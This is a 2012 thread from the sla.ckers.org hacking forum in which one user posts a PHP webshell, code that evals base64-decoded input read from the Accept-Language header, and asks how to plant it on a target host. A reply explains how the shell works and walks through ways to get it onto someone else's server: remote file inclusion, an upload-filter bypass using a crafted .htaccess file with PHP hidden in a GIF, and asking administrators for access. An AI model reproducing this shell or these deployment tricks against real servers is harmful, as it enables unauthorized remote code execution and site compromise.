Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do we crash systems, browsers, or otherwise bring things to a halt, and how do we protect those things? 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
help inserting php script into target hosting @ PHP 5.2.6 sleep() Local Memory Exhaust Exploit
Posted by: lazer
Date: January 02, 2012 10:20AM

Hey I want some help in executing this exploit. I'm stuck:(

In reference to exploit described in URL.
1337day.com/exploits/6543

<?php
/* put this one on target hosting */
if ( ! $data = @getenv('HTTP_ACCEPT_LANGUAGE'))
$data = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
if ( ! preg_match('#^[a-zA-Z0-9/+]*={0,2}$#', $data))
die('no propety data');
eval(base64_decode($data));
?>

The exploit says to put this in the target hosting. I want to know how can i do this? Don't i have to find an input parameter which takes php codes as input.

Options: ReplyQuote
Re: help inserting php script into target hosting @ PHP 5.2.6 sleep() Local Memory Exhaust Exploit
Posted by: infinity
Date: January 04, 2012 07:43AM

Hi lazer,

the code above is a webshell, which takes the content of the Accept-Language request-header field as input for an eval. The second part of the code in the description of the exploit will generate and send the content to the target system.

There are many ways of tricking the target server into executing the code of the webshell. This does not mean that the code always has to be present on the target system as an actual file. Often the presence of some further vulnerability is required.

One possibility is to use a remote file inclusion vulnerability (RFI), which is a common vulnerability on the web. You can find a description with an example here:
http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion

Wikipedia also has a description with a nice example:
http://en.wikipedia.org/wiki/Remote_file_inclusion

Another way could be to exploit a vulnerability in a file upload functionality, which allows users to upload avatar images or something like that. Uploading .php files may not be allowed. Sometimes it is possible to upload a file with the name ".htaccess" into a publicly accessible directory. The filename looks so weird that it may pass through a badly designed filter. But with this file you can tell the Apache server to parse files with an extension like .gif or .png as PHP. You can upload your PHP-webshell as a GIF image, there are tutorials on the web, which describe how to put PHP code into a GIF image. This trick is very old.

These are just two possibilities. You could also ask one of the site administrators for an FTP access or ask them to upload the webshell for you.
It's the simple things in life you treasure :-)

Options: ReplyQuote


Sorry, only registered users may post in this forum.